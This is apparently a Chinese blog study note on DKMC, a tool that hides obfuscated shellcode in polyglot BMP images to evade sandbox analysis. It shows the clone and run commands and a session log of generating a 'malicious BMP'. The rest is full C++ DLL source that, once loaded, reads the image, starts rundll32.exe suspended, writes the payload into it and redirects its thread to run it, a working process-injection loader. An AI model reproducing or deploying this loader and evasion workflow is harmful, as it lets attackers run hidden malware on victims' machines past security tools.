【笔记】DKMC学习笔记

发表于 更新于 阅读次数:

前言

Don’t kill my cat is a tool that generates obfuscated shellcode that is stored inside of polyglot images. The image is 100% valid and also 100% valid shellcode. The idea is to avoid sandbox analysis since it’s a simple “legit” image. For now the tool rely on PowerShell the execute the final shellcode payload.(Github

下载项目

1
2
git clone https://github.com/Mr-Un1k0d3r/DKMC.git
cd DKMC

运行项目

1
python2 dkmc.py

生成包含ShellCode的bmp图片

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
DKMC - Don't kill my cat
         Evasion tool - Mr.Un1k0d3r RingZer0 Team
     |\      _,,,---,,_
    /,`.-'`'    -.  ;-;;,_
   |,4-  ) )-,_..;\ (  `'-'
  '---''(_/--'  `-'\_)    The sleepy cat

----------------------------------------------------
Select an option:

	[*] (gen)	Generate a malicious BMP image
	[*] (web)	Start a web server and deliver malicious image
	[*] (ps)	Generate Powershell payload
	[*] (sc)	Generate shellcode from raw file
	[*] (exit)	Quit the application

>>> gen

=================================================================================
|                                                                               |
| Module to generate malicious Bitmap image with embedded obfuscation shellcode |
|                                                                               |
=================================================================================


Allowed options:

	[*] (show)	Show module variables
	[*] (set)	Set value (set key value)
	[*] (run)	Run the module
	[*] (exit)	Go back to the main menu

Module Variables description:

	debug       Show debug output. More verbose
	shellcode-pathPath to a raw shellcode file
	output      Output file path
	shellcode   Shellcode payload using \x41\x41 format
	source      Image source file path


Current variable value:

	debug       = false
	shellcode-path= 
	output      = output/output-1727577750.bmp
	shellcode   = 
	source      = sample/default.bmp

(generate)>>> set shellcode \x00\0x00\0x00\0x00  
	[+] shellcode value is set.

(generate)>>> run
	[+] Image size is 300 x 275
	[+] Generating obfuscation key 0x3d2d6fd1
	[+] Shellcode size 0xfc (252) bytes
	[+] Generating magic bytes 0xea275952
	[+] Final shellcode length is 0x14f (335) bytes
	[+] New BMP header set to 0x424de9acc50300
	[+] New height is 0x0e010000 (270)
	[+] Successfully save the image. (DKMC/output/output-1727577750.bmp)

(generate)>>>

C++的ShellCode执行器

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
#include "framework.h"
#include "windows.h"
#include "krpt.h"
#include <stdlib.h>
#include <stdio.h>


BOOL APIENTRY DllMain(HMODULE hModule,
    DWORD  ul_reason_for_call,
    LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    {
        FILE* fp;
        size_t size;
        unsigned char* buffer;
        fp = fopen("<file>.bmp", "rb");
        fseek(fp, 0, SEEK_END);
        size = ftell(fp);
        fseek(fp, 0, SEEK_SET);
        buffer = (unsigned char*)malloc(size);
        fread(buffer, size, 1, fp);

        char* v7A = (char*)VirtualAlloc(0, size, 0x3000u, 0x40u);
        memcpy((void*)v7A, buffer, size);

        struct _PROCESS_INFORMATION ProcessInformation;
        struct _STARTUPINFOA StartupInfo;
        void* v24;
        CONTEXT Context;
        DWORD DwWrite = 0;
        memset(&StartupInfo, 0, sizeof(StartupInfo));
        StartupInfo.cb = 68;
        BOOL result = CreateProcessA(0, (LPSTR)"rundll32.exe", 0, 0, 0, 0x44u, 0, 0, &StartupInfo, &ProcessInformation);
        if (result)
        {
            Context.ContextFlags = 65539;
            GetThreadContext(ProcessInformation.hThread, &Context);
            v24 = VirtualAllocEx(ProcessInformation.hProcess, 0, size, 0x1000u, 0x40u);
            WriteProcessMemory(ProcessInformation.hProcess, v24, v7A, size, &DwWrite);
            Context.Eip = (DWORD)v24;
            SetThreadContext(ProcessInformation.hThread, &Context);
            ResumeThread(ProcessInformation.hThread);
            CloseHandle(ProcessInformation.hThread);
            result = CloseHandle(ProcessInformation.hProcess);
        }


        TerminateProcess(GetCurrentProcess(), 0);
    };
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

完成